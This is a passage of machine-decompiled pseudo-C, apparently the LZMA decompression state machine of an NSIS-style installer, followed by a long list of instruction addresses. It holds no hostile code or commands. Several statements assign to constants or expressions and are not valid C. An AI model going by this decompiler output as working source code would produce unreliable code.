												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                      0x00000000
                                                      0x00406ffe
                                                      0x00406ffe
                                                      0x00407002
                                                      0x00407023
                                                      0x0040702a
                                                      0x00407030
                                                      0x00407036
                                                      0x00407048
                                                      0x0040704e
                                                      0x00407053
                                                      0x00000000
                                                      0x00407004
                                                      0x0040700a
                                                      0x004073cb
                                                      0x004073cb
                                                      0x004073cb
                                                      0x004073ce
                                                      0x004073ce
                                                      0x004073ce
                                                      0x004073d4
                                                      0x004073da
                                                      0x004073e0
                                                      0x004073fa
                                                      0x004073fd
                                                      0x00407403
                                                      0x0040740e
                                                      0x00407410
                                                      0x004073e2
                                                      0x004073e2
                                                      0x004073f1
                                                      0x004073f5
                                                      0x004073f5
                                                      0x0040741a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040741c
                                                      0x00407420
                                                      0x004075cf
                                                      0x004075e5
                                                      0x004075ed
                                                      0x004075f4
                                                      0x004075f6
                                                      0x004075fd
                                                      0x00407601
                                                      0x00407601
                                                      0x0040742c
                                                      0x00407433
                                                      0x0040743b
                                                      0x0040743e
                                                      0x00407441
                                                      0x00407441
                                                      0x00407447
                                                      0x00407447
                                                      0x00406be3
                                                      0x00406be3
                                                      0x00406be3
                                                      0x00406bec
                                                      0x00000000
                                                      0x00000000
                                                      0x00406bf2
                                                      0x00000000
                                                      0x00406bfd
                                                      0x00000000
                                                      0x00000000
                                                      0x00406c06
                                                      0x00406c09
                                                      0x00406c0c
                                                      0x00406c10
                                                      0x00000000
                                                      0x00000000
                                                      0x00406c16
                                                      0x00406c19
                                                      0x00406c1b
                                                      0x00406c1c
                                                      0x00406c1f
                                                      0x00406c21
                                                      0x00406c22
                                                      0x00406c24
                                                      0x00406c27
                                                      0x00406c2c
                                                      0x00406c31
                                                      0x00406c3a
                                                      0x00406c4d
                                                      0x00406c50
                                                      0x00406c5c
                                                      0x00406c84
                                                      0x00406c86
                                                      0x00406c94
                                                      0x00406c94
                                                      0x00406c98
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406c88
                                                      0x00406c88
                                                      0x00406c8b
                                                      0x00406c8c
                                                      0x00406c8c
                                                      0x00000000
                                                      0x00406c88
                                                      0x00406c62
                                                      0x00406c67
                                                      0x00406c67
                                                      0x00406c70
                                                      0x00406c78
                                                      0x00406c7b
                                                      0x00000000
                                                      0x00406c81
                                                      0x00406c81
                                                      0x00000000
                                                      0x00406c81
                                                      0x00000000
                                                      0x00406c9e
                                                      0x00406c9e
                                                      0x00406ca2
                                                      0x0040754e
                                                      0x00000000
                                                      0x0040754e
                                                      0x00406cab
                                                      0x00406cbb
                                                      0x00406cbe
                                                      0x00406cc1
                                                      0x00406cc1
                                                      0x00406cc1
                                                      0x00406cc4
                                                      0x00406cc8
                                                      0x00000000
                                                      0x00000000
                                                      0x00406cca
                                                      0x00406cd0
                                                      0x00406cfa
                                                      0x00406d00
                                                      0x00406d07
                                                      0x00000000
                                                      0x00406d07
                                                      0x00406cd6
                                                      0x00406cd9
                                                      0x00406cde
                                                      0x00406cde
                                                      0x00406ce9
                                                      0x00406cf1
                                                      0x00406cf4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406d39
                                                      0x00406d3f
                                                      0x00406d42
                                                      0x00406d4f
                                                      0x00406d57
                                                      0x00000000
                                                      0x00000000
                                                      0x00406d0e
                                                      0x00406d0e
                                                      0x00406d12
                                                      0x0040755d
                                                      0x00000000
                                                      0x0040755d
                                                      0x00406d1e
                                                      0x00406d29
                                                      0x00406d29
                                                      0x00406d29
                                                      0x00406d2c
                                                      0x00406d2f
                                                      0x00406d32
                                                      0x00406d37
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004073ce
                                                      0x004073ce
                                                      0x004073d4
                                                      0x004073da
                                                      0x004073e0
                                                      0x004073fa
                                                      0x004073fd
